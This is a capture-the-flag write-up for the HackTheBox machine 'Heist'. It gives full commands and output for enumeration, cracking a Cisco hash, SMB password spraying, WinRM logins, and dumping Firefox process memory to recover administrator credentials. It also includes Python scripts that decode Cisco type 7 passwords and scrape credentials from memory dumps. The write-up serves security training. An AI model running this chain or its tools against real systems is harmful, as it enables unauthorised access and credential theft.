HackTheBox Heist

Heist is a box rated easy that exercises practical enumeration and credential reuse. Initial foothold is achieved by leveraging an improper security configuration: a router config file with recoverable secrets left in a public web directory.
Start by checking what ports are open:

nmap -sS -Pn -A 10.10.10.149
80/tcp  open  http          Microsoft IIS httpd 10.0
135/tcp open  msrpc         Microsoft Windows RPC
445/tcp open  microsoft-ds?

The output above is trimmed to the three services that matter for the foothold. The WinRM login used later needs TCP 5985 reachable as well, so confirm that port before relying on evil-winrm.

Enumerate public files and folders on the web server. The attachments/ directory is the interesting one.

# dirb http://10.10.10.149

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Oct 19 18:27:44 2019
URL_BASE: http://10.10.10.149/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.10.10.149/ ----
==> DIRECTORY: http://10.10.10.149/attachments/                                                                                            
==> DIRECTORY: http://10.10.10.149/css/                                                                                                    
==> DIRECTORY: http://10.10.10.149/images/                                                                                                 
==> DIRECTORY: http://10.10.10.149/Images/                                                                                                 
+ http://10.10.10.149/index.php (CODE:302|SIZE:0)                                                                                          
==> DIRECTORY: http://10.10.10.149/js/  

Determine the SMB version using metasploit. The scanner reports dialect 255.2 (hex 0x02FF, the SMB2 wildcard dialect), which only confirms that SMB2 or later is negotiated; SMB1 is not required.

msf5 auxiliary(scanner/smb/smb2) > exploit

[+] 10.10.10.149:445      - 10.10.10.149 supports SMB 2 [dialect 255.2] and has been online for 3671180 hours
[*] 10.10.10.149:445      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Cisco type 5 secrets are salted MD5 crypt hashes ($1$salt$hash) and are cheap to attack with a wordlist. The router config at http://10.10.10.149/attachments/config.txt contains one. Save it in john's user:hash format as cisco5.txt

cisco5.txt

enable_secret:$1$pdQG$o8nrSzsGXeaduXrjlvKc91

Then use John the Ripper to brute-force it with the rockyou.txt wordlist

# /usr/sbin/john --wordlist=/usr/share/wordlists/rockyou.txt cisco5.txt 
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
stealth1agent    (enable_secret)
1g 0:00:00:21 DONE (2019-10-22 17:07) 0.04633g/s 162434p/s 162434c/s 162434C/s stealthy001..steak7893
Use the "--show" option to display all of the cracked passwords reliably
Session completed
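The same config file format carries more than the type 5 secret: "password 7" entries are reversibly obfuscated with Cisco's fixed XOR key, not hashed, so they need no cracking at all. The script below is an added example, not part of the original writeup; it parses an IOS-style config, emits type 5 hashes in john's user:hash format and decodes type 7 strings directly. The sample config embedded in it is constructed for the example (its enable secret is the hash from cisco5.txt above, and its two type 7 strings decode to the two router passwords that appear in passwords.txt further down).

```python
import re

# Cisco's fixed XOR key used by "service password-encryption" (type 7).
XLAT = "dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"

# Constructed sample config for this example; not the full file from the box.
SAMPLE_CONFIG = """\
version 12.2
no service pad
service password-encryption
!
hostname router
!
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
!
"""

SECRET5_RE = re.compile(r"^\s*enable secret 5 (\$1\$\S+)", re.M)
USER_RE = re.compile(
    r"^\s*username (\S+)(?: privilege \d+)? (?:password|secret) (\d) (\S+)", re.M
)


def decode_type7(enc: str) -> str:
    """Decode a Cisco type 7 string.

    Layout: two decimal digits giving the starting offset into XLAT, then one
    hex byte per character, each XORed with the next key byte.
    """
    if len(enc) < 4 or len(enc) % 2 or not re.fullmatch(r"[0-9A-Fa-f]+", enc):
        raise ValueError(f"not a type 7 string: {enc!r}")
    seed = int(enc[:2], 10)
    out = []
    for pos, i in enumerate(range(2, len(enc), 2)):
        byte = int(enc[i:i + 2], 16)
        out.append(chr(byte ^ ord(XLAT[(seed + pos) % len(XLAT)])))
    return "".join(out)


def extract_credentials(config: str) -> dict:
    """Return john-format lines for hashed secrets and a dict of recovered cleartext."""
    john, clear = [], {}
    for m in SECRET5_RE.finditer(config):
        john.append(f"enable_secret:{m.group(1)}")
    for user, ptype, value in USER_RE.findall(config):
        if ptype == "7":           # reversible obfuscation
            clear[user] = decode_type7(value)
        elif ptype == "5":         # md5crypt, hand to john
            john.append(f"{user}:{value}")
        elif ptype == "0":         # stored in the clear
            clear[user] = value
    return {"john": john, "cleartext": clear}


def candidate_passwords(config: str) -> list:
    """Password list for spraying: every cleartext value recovered from the config."""
    return sorted(set(extract_credentials(config)["cleartext"].values()))


if __name__ == "__main__":
    creds = extract_credentials(SAMPLE_CONFIG)
    print("\n".join(creds["john"]))              # feed to john --wordlist
    for user, pw in creds["cleartext"].items():   # feed to smb_login
        print(f"{user}:{pw}")
```

Type 7 values decode in microseconds, so any config that exposes them has effectively leaked those passwords; the type 5 line still goes to john, and the cracked enable secret is added to the same spray list.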

Create a file with the usernames seen so far (the router usernames plus a few common local accounts), users.txt, and a file with every password recovered from the config, passwords.txt. Then use the metasploit scanner smb_login to test each combination against the SMB service discovered with nmap

# msfconsole
msf5 > use auxiliary/scanner/smb/smb_login
msf5 auxiliary(scanner/smb/smb_login) > set rhost 10.10.10.149
msf5 auxiliary(scanner/smb/smb_login) > set PASS_FILE /root/projects/heist/passwords.txt
msf5 auxiliary(scanner/smb/smb_login) > set USER_FILE /root/projects/heist/users.txt
msf5 auxiliary(scanner/smb/smb_login) > run

[*] 10.10.10.149:445      - 10.10.10.149:445 - Starting SMB login bruteforce
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\Administrator:$uperP@ssword',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\Administrator:Q4)sJu\Y8qz*A3?d',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\Administrator:stealth1agent',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\Hazard:$uperP@ssword',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\Hazard:Q4)sJu\Y8qz*A3?d',
[+] 10.10.10.149:445      - 10.10.10.149:445 - Success: '.\Hazard:stealth1agent'
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\admin:$uperP@ssword',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\admin:Q4)sJu\Y8qz*A3?d',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\admin:stealth1agent',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\rout3r:$uperP@ssword',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\rout3r:Q4)sJu\Y8qz*A3?d',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\rout3r:stealth1agent',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\Admin:$uperP@ssword',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\Admin:Q4)sJu\Y8qz*A3?d',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\Admin:stealth1agent',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\Rout3r:$uperP@ssword',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\Rout3r:Q4)sJu\Y8qz*A3?d',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\Rout3r:stealth1agent',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\router:$uperP@ssword',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\router:Q4)sJu\Y8qz*A3?d',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\router:stealth1agent',
[*] 10.10.10.149:445      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

One combination succeeds: the enable secret cracked from the router config is also the Windows password of the local user Hazard

[+] 10.10.10.149:445      - 10.10.10.149:445 - Success: '.\Hazard:stealth1agent'

Using these credentials, list the available shares. The SMB1 reconnect failure at the end is expected (the host only speaks SMB2+) and can be ignored

# smbclient -L 10.10.10.149 -U Hazard
Enter WORKGROUP\Hazard's password: 

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
Reconnecting with SMB1 for workgroup listing.

do_connect: Connection to 10.10.10.149 failed (Error NT_STATUS_IO_TIMEOUT)
Failed to connect with SMB1 -- no workgroup available

Then list the permissions on the shares. Hazard can only read IPC$, so the account gives no file access, but an IPC$ session is enough for RID cycling and user enumeration

# smbmap -H 10.10.10.149 -u Hazard -p stealth1agent
[+] Finding open SMB ports....
[+] User SMB session establishd on 10.10.10.149...
[+] IP: 10.10.10.149:445	Name: 10.10.10.149                                      
	Disk                                                  	Permissions
	----                                                  	-----------
	ADMIN$                                            	NO ACCESS
	C$                                                	NO ACCESS
	IPC$                                              	READ ONLY

Enumerate further with enum4linux using Hazard's credentials. It reveals a few more local users (note the gaps in the RIDs), which we add to users.txt and feed back into the login scanner

# enum4linux -u Hazard -p stealth1agent -a 10.10.10.149 2>/dev/null

S-1-5-21-4254423774-1266059056-3197185112-1008 SUPPORTDESK\Hazard (Local User)
S-1-5-21-4254423774-1266059056-3197185112-1009 SUPPORTDESK\support (Local User)
S-1-5-21-4254423774-1266059056-3197185112-1012 SUPPORTDESK\Chase (Local User)

Re-running smb_login with the extended user list reveals another valid combination: Chase reuses the router admin's type 7 password

[+] 10.10.10.149:445      - 10.10.10.149:445 - Success: '.\Chase:Q4)sJu\Y8qz*A3?d'
user: Chase
pass: Q4)sJu\Y8qz*A3?d

Connect over WinRM using evil-winrm and the newly discovered credentials (Chase is allowed to log on remotely; Hazard is not)

# ./evil-winrm.rb -i 10.10.10.149 -u Chase -p 'Q4)sJu\Y8qz*A3?d'
Evil-WinRM shell v1.8
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Chase\Documents> 

Read the user flag

*Evil-WinRM* PS C:\Users\Chase\Desktop> cat user.txt
a127daef77ab6d9d92008653295f59c4

Upload procdump64.exe from https://docs.microsoft.com/en-us/sysinternals/downloads/procdump to the host, for example with evil-winrm's built-in upload command.

List the PIDs of the Firefox processes running on the host

*Evil-WinRM* PS C:\Users\Chase\Documents\vrs> ps|findstr fire
    358      25    16100     279180       1.28   6424   1 firefox                                                                                                                                                                                        
    390      31    38912     305376      34.13   6488   1 firefox                                                                                                                                                                                        
   1134      69   127720     465632      38.45   6624   1 firefox                                                                                                                                                                                        
    343      19    10008     266232       0.83   6760   1 firefox                                                                                                                                                                                        
    408      31    16964     294960       1.59   7104   1 firefox     

Dump one of the Firefox processes, here PID 6624 (the one with the largest working set). The dump is around 450 MB.

Procdump's -ma option writes a 'Full' dump file:

   -ma     Write a 'Full' dump file.
           Includes All the Image, Mapped and Private memory.

./procdump64.exe -accepteula -ma 6624

ProcDump v9.0 - Sysinternals process dump utility
Copyright (C) 2009-2017 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com

[02:07:24] Dump 1 initiated: C:\Users\Chase\Documents\vrs\firefox.exe_191028_020724.dmp
[02:07:25] Dump 1 writing: Estimated dump file size is 467 MB.
[02:07:28] Dump 1 complete: 468 MB written in 3.7 seconds
[02:07:28] Dump count reached.

Search the dump for the string 'admin' and observe a new set of credentials embedded in a login URL. Get-Content reads the 468 MB dump line by line, which is slow; Select-String -Path with -Pattern is faster, as is pulling the dump back to the attacker box and running strings over it

*Evil-WinRM* PS C:\Users\Chase\Documents\vrs> Get-Content firefox.exe_191028_020724.dmp | Select-String 'admin'

ååååååxhttp://localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=åååååååååååååååååååååxjar:file:///C:/Program%20Files/Mozilla%20Firefox/browser/omni.ja!/modules/UrlbarValueFormatter.jsmåååååååå
u: admin@support.htb
p: 4dD!5}x/re8]FBuZ
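A plain text grep over a process dump misses two things that matter in practice: browser strings are often stored as UTF-16LE (a NUL between every character, so an ASCII pattern never matches), and values inside URLs may be percent-encoded. The script below is an added example, not part of the original writeup; it pulls both narrow and wide printable runs out of a dump, looks for the login_username / login_password pair seen above and URL-decodes the values. The dump bytes it scans are constructed for the example (the same URL embedded once as ASCII and once as percent-encoded UTF-16LE), not the real firefox.exe dump.

```python
import re
from urllib.parse import unquote_plus

# Printable runs of 8+ chars, narrow and wide (UTF-16LE), as strings(1) would find them.
ASCII_RUN = re.compile(rb"[\x20-\x7e]{8,}")
WIDE_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){8,}")

# The parameter pair observed in the login URL; assumed form names for this example.
CRED_RE = re.compile(r"login_username=([^&\s]+)&login_password=([^&\s]+)")

# Constructed sample "dump": padding, the URL as ASCII, then the same URL
# percent-encoded and stored as UTF-16LE, then trailing junk.
SAMPLE_DUMP = (
    b"\x00" * 16
    + b"xhttp://localhost/login.php?login_username=admin@support.htb"
    + b"&login_password=4dD!5}x/re8]FBuZ&login="
    + b"\x00" * 8
    + ("http://localhost/login.php?login_username=admin%40support.htb"
       "&login_password=4dD%215%7Dx%2Fre8%5DFBuZ&login=").encode("utf-16le")
    + b"\xff" * 4
)


def extract_strings(data: bytes):
    """Yield (encoding, text) for every printable run in the blob."""
    for m in ASCII_RUN.finditer(data):
        yield "ascii", m.group().decode("ascii")
    for m in WIDE_RUN.finditer(data):
        yield "utf-16le", m.group().decode("utf-16le")


def find_login_params(data: bytes) -> list:
    """Return decoded credential pairs found in the dump, one entry per encoding hit."""
    seen, hits = set(), []
    for enc, text in extract_strings(data):
        for m in CRED_RE.finditer(text):
            # unquote_plus also maps '+' to space, matching form-encoding rules.
            user, password = unquote_plus(m.group(1)), unquote_plus(m.group(2))
            key = (enc, user, password)
            if key not in seen:
                seen.add(key)
                hits.append({"encoding": enc, "user": user, "password": password})
    return hits


if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_DUMP
    for hit in find_login_params(blob):
        print(f"[{hit['encoding']}] {hit['user']} : {hit['password']}")
```

Run it against a real dump with the file path as the first argument; the regexes stream over the whole blob, so a multi-hundred-megabyte dump is fine. Extend CRED_RE with other parameter names (password=, pwd=, Authorization: Basic) when hunting in dumps of other applications.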

The web application's admin password is also the local Administrator's password. Connect with evil-winrm as Administrator and read the root flag from the Administrator's desktop

root@kali:~/projects/heist/evil-winrm# ./evil-winrm.rb -i 10.10.10.149 -u Administrator -p '4dD!5}x/re8]FBuZ'

*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
50dfa3c6bfd20e2e0d071b073d766897